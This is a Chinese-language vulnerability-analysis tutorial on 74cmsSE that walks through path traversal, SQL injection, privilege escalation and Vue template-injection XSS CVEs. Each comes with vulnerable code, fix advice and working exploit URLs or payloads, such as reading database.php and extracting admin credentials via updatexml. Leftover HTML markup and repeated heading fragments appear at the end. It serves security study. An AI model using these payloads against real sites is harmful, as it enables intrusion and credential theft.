74cmsSE 系列代码审计与漏洞分析教学文档<\/h1>

一、前言<\/h2>
本文档详细分析74cmsSE系统的多个安全漏洞，包括任意文件读取、SQL注入、越权漏洞、XSS漏洞等。通过代码审计和漏洞复现，帮助安全研究人员深入理解这些漏洞的成因和利用方式。<\/p>

二、环境搭建<\/h2>

本地审计环境：MAMP集成环境<\/li>

组件版本：

Apache 2.4.54<\/li>
MySQL 5.7.39<\/li>

PHP 7.3.33<\/li> <\/ul> <\/li> <\/ul>

三、漏洞分析<\/h2>

1. v3.4.1 任意文件读取漏洞 (CVE-2022-26271)<\/h3>

漏洞位置<\/strong>：Download.php<\/code>文件中的fread()<\/code>和fopen()<\/code>函数<\/p>

漏洞成因<\/strong>：<\/p>

对输入参数$url<\/code>未进行充分过滤<\/li> 直接使用用户可控的输入作为文件路径<\/li> <\/ul> 关键代码分析<\/strong>：<\/p> \/\/ 从GET参数获取输入，仅进行trim操作 <\/span><\/span><\/span><\/span>$url =<\/span> input<\/span>('get.url\/s'<\/span>, ''<\/span>, 'trim'<\/span>); <\/span><\/span>$ourput_filename =<\/span> input<\/span>('get.name\/s'<\/span>, ''<\/span>, 'trim'<\/span>); <\/span><\/span> <\/span><\/span>\/\/ 直接使用用户输入作为文件路径 <\/span><\/span><\/span><\/span>$fp =<\/span> fopen<\/span>($url, "rb"<\/span>); <\/span><\/span><\/code><\/pre>利用方式<\/strong>：<\/p> \/index.php\/index\/download\/index?name=index.php&url=..\/..\/application\/database.php <\/code><\/pre> 修复建议<\/strong>：<\/p> 对$url<\/code>参数进行严格过滤，禁止..\/<\/code>等路径遍历字符<\/li> 限制可访问的文件目录范围<\/li> <\/ul> 2. v3.5.1 SQL注入漏洞 (CNVD-2022-61443, CVE-2022-33095)<\/h3> 漏洞位置<\/strong>：v1_0\/controller\/home\/Jobfairol.php<\/code>中的keyword<\/code>参数<\/p> 漏洞成因<\/strong>：<\/p> 使用PDO但未正确使用参数绑定<\/li> 直接拼接用户输入到SQL语句中<\/li> 仅对输入进行trim()<\/code>操作，无其他过滤<\/li> <\/ul> 关键代码分析<\/strong>：<\/p> $keyword =<\/span> input<\/span>('get.keyword\/s'<\/span>, ''<\/span>, 'trim'<\/span>); <\/span><\/span> <\/span><\/span>\/\/ 直接拼接用户输入到SQL语句中 <\/span><\/span><\/span><\/span>$sql =<\/span> "SELECT `b`.`id` FROM `qs_jobfair_online_participate` `a` <\/span><\/span><\/span> RIGHT JOIN `qs_resume_search_key` `b` ON `a`.`uid`=`b`.`uid` <\/span><\/span><\/span> WHERE `a`.`jobfair_id` = 1 AND `a`.`utype` = 2 AND `a`.`audit` = 1 <\/span><\/span><\/span> AND (MATCH (`intention_jobs`) AGAINST ('<\/span>$keyword<\/span>' IN BOOLEAN MODE)) <\/span><\/span><\/span> ORDER BY `b`.`refreshtime` DESC LIMIT 0,10"<\/span>; <\/span><\/span><\/code><\/pre>利用方式<\/strong>：<\/p> \/index.php\/v1_0\/home\/jobfairol\/resumelist?jobfair_id=1&keyword=' (select\/**\/updatexml(0,concat(0xa,(select\/**\/concat(username,password)from\/**\/qs_admin)),0))))%23 <\/code><\/pre> MATCH AGAINST结构分析<\/strong>：<\/p> MATCH<\/span> (col1,col2,...) AGAINST (expr [search_modifier]) <\/span><\/span><\/code><\/pre> col<\/code>：要搜索的列<\/li> expr<\/code>：检索的关键字（漏洞点）<\/li> modifier<\/code>：搜索模式（可选）<\/li> <\/ul> 修复代码<\/strong>：后续版本增加了addslashes<\/code>过滤：<\/p> $keyword =<\/span> addslashes<\/span>(input<\/span>('get.keyword\/s'<\/span>, ''<\/span>, 'trim'<\/span>)); <\/span><\/span><\/code><\/pre>绕过思考<\/strong>：<\/p> 配合代码中的其他操作如urldecode<\/code>、base64_decode<\/code><\/li> GBK编码下的宽字节注入（未成功）<\/li> <\/ul> 3. v3.5.1 Job.php SQL注入 (CVE-2022-33092)<\/h3> 漏洞位置<\/strong>：v1_0\/controller\/home\/Job.php<\/code>中的keyword<\/code>参数<\/p> 关键代码<\/strong>：<\/p> $keyword =<\/span> input<\/span>('get.keyword\/s'<\/span>, ''<\/span>, 'trim'<\/span>); <\/span><\/span><\/code><\/pre>利用方式<\/strong>：<\/p> \/index.php\/v1_0\/home\/job\/index?keyword='+(select+updatexml(0,concat(0x1,(select\/**\/user())),0))+' <\/code><\/pre> 其他参数分析<\/strong>：<\/p> $tag<\/code>参数：使用FIND_IN_SET<\/code>函数，输入被逗号分隔，难以利用<\/li> $sort<\/code>参数：仅在特定字段时出现，暂未发现利用方式<\/li> <\/ul> 4. v3.12.0 越权漏洞 (CVE-2022-41471)<\/h3> 漏洞位置<\/strong>：\/application\/apiadmin\/controller\/Admin.php<\/code>中的edit()<\/code>方法<\/p> 漏洞成因<\/strong>：<\/p> 缺乏完善的鉴权机制<\/li> 任何有后台访问权限的用户都可以修改其他管理员密码<\/li> <\/ul> 复现步骤<\/strong>：<\/p> 创建自定义角色权限（如"ceshi"）<\/li> 添加管理员用户并分配该角色（如"ceshi1"）<\/li> 使用"ceshi1"登录后台即可修改admin密码<\/li> <\/ol> 修复建议<\/strong>：<\/p> 增加权限检查，确保用户只能修改自己的密码或具有足够权限<\/li> <\/ul> 5. v3.12.0 XSS漏洞 (CVE-2022-41472)<\/h3> 漏洞位置<\/strong>：Notice.php<\/code><\/p> 漏洞成因<\/strong>：<\/p> 仅对输入进行trim()<\/code>过滤<\/li> 前端未使用dompurify<\/code>等过滤库<\/li> Vue.js模板注入导致DOM XSS<\/li> <\/ul> 利用方式<\/strong>：<\/p> {{$on.constructor('alert(1)')()}} {{alert(1)}} <\/code><\/pre> Vue.js模板注入原理<\/strong>： Vue.js作为客户端模板框架，会将用户输入嵌入模板中，恶意输入可能被错误解析执行。<\/p> 6. v3.13.0 文件上传漏洞<\/h3> 分析说明<\/strong>：<\/p> 未成功复现<\/li> 代码中对文件后缀名进行了限制<\/li> 需要进一步研究绕过方式<\/li> <\/ul> 四、审计总结<\/h2> SQL注入<\/strong>：<\/p> 主要问题：使用PDO但未正确绑定参数，直接拼接SQL<\/li> 关键点：MATCH AGAINST<\/code>结构中的表达式注入<\/li> <\/ul> <\/li> 文件操作漏洞<\/strong>：<\/p> 问题：未过滤路径遍历字符（如..\/<\/code>）<\/li> 关键点：fopen()<\/code>、fread()<\/code>等函数的参数控制<\/li> <\/ul> <\/li> 权限漏洞<\/strong>：<\/p> 问题：缺乏完善的权限检查机制<\/li> 关键点：功能函数中的权限验证缺失<\/li> <\/ul> <\/li> XSS漏洞<\/strong>：<\/p> 问题：输入过滤不足，前端未正确处理<\/li> 关键点：Vue.js模板注入特性<\/li> <\/ul> <\/li> 审计方法论<\/strong>：<\/p> 从可控点和高危函数出发<\/li> 关注输入过滤和代码逻辑<\/li> 特别注意PDO使用方式（是否真正绑定参数）<\/li> <\/ul> <\/li> <\/ol> 五、防御建议<\/h2> 输入过滤<\/strong>：<\/p> 对所有用户输入进行严格过滤<\/li> 使用白名单机制限制输入内容<\/li> <\/ul> <\/li> SQL安全<\/strong>：<\/p> 始终使用参数化查询<\/li> 避免直接拼接SQL语句<\/li> <\/ul> <\/li> 文件操作<\/strong>：<\/p> 限制可访问的文件目录<\/li> 过滤特殊字符如..\/<\/code><\/li> <\/ul> <\/li> 权限控制<\/strong>：<\/p> 实施最小权限原则<\/li> 关键操作增加权限验证<\/li> <\/ul> <\/li> XSS防御<\/strong>：<\/p> 输出编码<\/li> 使用DOM净化库如dompurify<\/code><\/li> <\/ul> <\/li> 安全开发<\/strong>：<\/p> 遵循安全编码规范<\/li> 定期进行代码审计和安全测试<\/li> <\/ul> <\/li> <\/ol>

74cmsSE 系列代码审计与漏洞分析教学文档<\/h1>

一、前言<\/h2> 本文档详细分析74cmsSE系统的多个安全漏洞，包括任意文件读取、SQL注入、越权漏洞、XSS漏洞等。通过代码审计和漏洞复现，帮助安全研究人员深入理解这些漏洞的成因和利用方式。<\/p>

三、漏洞分析<\/h2>

一、前言<\/h2>
本文档详细分析74cmsSE系统的多个安全漏洞，包括任意文件读取、SQL注入、越权漏洞、XSS漏洞等。通过代码审计和漏洞复现，帮助安全研究人员深入理解这些漏洞的成因和利用方式。<\/p>